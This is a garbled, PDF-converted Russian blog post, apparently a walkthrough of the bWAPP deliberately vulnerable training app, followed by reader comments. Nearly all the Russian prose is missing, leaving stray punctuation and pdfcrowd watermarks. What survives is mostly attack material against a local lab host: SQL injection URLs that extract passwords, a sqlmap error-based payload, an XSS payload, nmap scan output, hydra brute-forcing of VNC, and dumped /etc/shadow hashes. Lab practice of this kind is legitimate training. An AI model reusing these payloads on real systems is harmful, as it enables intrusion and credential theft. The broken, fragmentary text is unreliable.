Академический Документы
Профессиональный Документы
Культура Документы
Geektimes
@Mach1ne
31,0
0,0
Google Devices
32
31
14 2015 15:35
- OWASP Top-10
bWAPP
- *, *
, !
- ( ), OWASP Top-10,
bWAPP.
:
Open Web Application Security Project (OWASP) -. OWASP
, . , , ,
, . -10
-, -.
-10 :
pdfcrowd.com
pdfcrowd.com
A1
A2
A3 (XSS)
A4
A5
A6
A7
A8 (CSRF)
A9
A10
, .
buggy web application (bWAPP) -, . , 100
, -10 OWASP. - .
bWAPP Malik Mesellem ( )
pdfcrowd.com
:
, , .
bwapp , .
:
, - ( :)), , ,
-.
:
, bWAPP.
, .
:
/ . -.
pdfcrowd.com
:)
WARNING!
:
1. - .
2. , .
/ .
// .
SQL-injection
SQL Injection (GET/Search)
, . , Hulk.
pdfcrowd.com
, :
http://192.168.1.18/bWAPP/sqli_1.php?title=hulk&action=search
order by :
http://192.168.1.18/bWAPP/sqli_1.php?title=hulk%27%20order%20by%2010%20--%20&action=search
7:
http://192.168.1.18/bWAPP/sqli_1.php?title=hulk%27%20order%20by%207%20--%20&action=search
union:
pdfcrowd.com
http://192.168.1.18/bWAPP/sqli_1.php?title=hulk%27%20union%20select%201,2,3,4,5,6,7%20from%20users%20--%20&action=search
, , :
http://192.168.1.18/bWAPP/sqli_1.php?title=hulk%27%20union%20select%201,database%28%29,user%28%29,4,password,6,7%20from%20users%20--%20&action=search
pdfcrowd.com
, , Request .txt .
sqlmap :
sqlmap -r sql.txt
pdfcrowd.com
sqlmap , , , , :
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: title=hulk%' AND (SELECT 2135 FROM(SELECT COUNT(*),CONCAT(0x7178766a71,(SELECT (CASE WHEN (2135=2135) THEN 1 ELSE 0 END)),0x7162767071,FLOOR(RAND(0)*2))x F
ROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&action=search
payload :
http://192.168.1.18/bWAPP/sqli_1.php?title=hulk%' AND (SELECT 2135 FROM(SELECT COUNT(*),CONCAT(0x7178766a71,(SELECT (CASE WHEN (2135=2135) THEN 1 ELSE 0 END)),0x7162767
071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&action=search
, , :
XSS?
.
XSS Reflected (GET)
<script>alert(1);</script>
pdfcrowd.com
pdfcrowd.com
/etc/passwd:
pdfcrowd.com
/etc/:
pdfcrowd.com
boot2root ( bWAPP) ,
.
nmap':
STATE SERVICE
21/tcp
open
ftp
22/tcp
open
ssh
pdfcrowd.com
25/tcp
open
smtp
80/tcp
open
http
139/tcp
open
netbios-ssn
443/tcp
open
https
445/tcp
open
microsoft-ds
512/tcp
open
exec
513/tcp
open
login
514/tcp
open
shell
666/tcp
open
doom
3306/tcp open
mysql
5901/tcp open
vnc-1
6001/tcp open
X11:1
8080/tcp open
http-proxy
8443/tcp open
https-alt
9080/tcp open
glrpc
FTP
Dirbuster:
nmap --script=ftp*
, :
PORT
STATE SERVICE
VERSION
21/tcp
open
ProFTPD 1.3.1
ftp
1 root
www-data
543803 Nov
2 22:52 Iron_Man.pdf
| -rw-rw-r--
1 root
www-data
462949 Nov
2 22:52 Terminator_Salvation.pdf
| -rw-rw-r--
1 root
www-data
544600 Nov
2 22:52 The_Amazing_Spider-Man.pdf
| -rw-rw-r--
1 root
www-data
526187 Nov
2 22:52 The_Cabin_in_the_Woods.pdf
| -rw-rw-r--
1 root
www-data
756522 Nov
2 22:52 The_Dark_Knight_Rises.pdf
pdfcrowd.com
| -rw-rw-r--
1 root
www-data
618117 Nov
|_-rw-rw-r--
1 root
www-data
5010042 Nov
2 22:52 The_Incredible_Hulk.pdf
2 22:52 bWAPP_intro.pdf
, , ftp http, ? :)
pdfcrowd.com
VNC
192.168.1.18:5901
, hydra:
! , root'.
pdfcrowd.com
root, /etc/shadow
root:$1$6.aigTP1$FC1TuoITEYSQwRV0hi6gj/:15792:0:99999:7:::
bee:$1$tJB0ndAJ$0d42BkRQ7vebj/bE5RdQH1:15792:0:99999:7:::
neo:$1$fSorv0ad$56lfF9qd8o4caaSB6dVqi/:15897:0:99999:7:::
alice:$1$yRUOVrYB$9f4TMaym/xOSeGbmsgFGI/:15897:0:99999:7:::
thor:$1$Iy6Mvuaz$FzcNXTQ668kDD5LY.ObdL/:15897:0:99999:7:::
wolverine:$1$PUGlrXi8$oXOwDBaAzxtgXh10Xkw9i/:15897:0:99999:7:::
johnny:$1$uqzKnduQ$MPxhWXcf2FFQarhO95d5y/:15897:0:99999:7:::
selene:$1$BHZLob3h$mru35IhZzRdnfTHOADrkJ0:15897:0:99999:7:::
hashcat' :
bWAPP Malik Mesellem ( )
-10 OWASP
@BeLove
, @BeLove
g0tmi1k , boot2root
, 5
. .
pdfcrowd.com
pdfcrowd.com
- 4
34
,
64
subversion trac
20
+17
25,4k
@Mach1ne
215
31,0
0,0
+10
TP-LINK ,
15,5k
+19
12
16
71
pdfcrowd.com
+11
2,4k
+10
ITSM
1,9k
+8
42
js-
1,3k
11
(8)
+1
, , .
0
, , Beast/crime/breach?
, , , bwapp' , , .
pentesterlab
bWAPP'a, 2 , ( ) cheatsheet', .
.
. , 40 , - ,
.
0
xss - / - (.. ).
CTF (cutycapt ).
, (ruby/java/python). php :)
+2
bWAPP. :)
pdfcrowd.com
OWASP .
+1
pdfcrowd.com
, , . , , .
. , .
Firefox 48
en Source
b, fb2, .
pdfcrowd.com
TM
IT
Q&A
pdfcrowd.com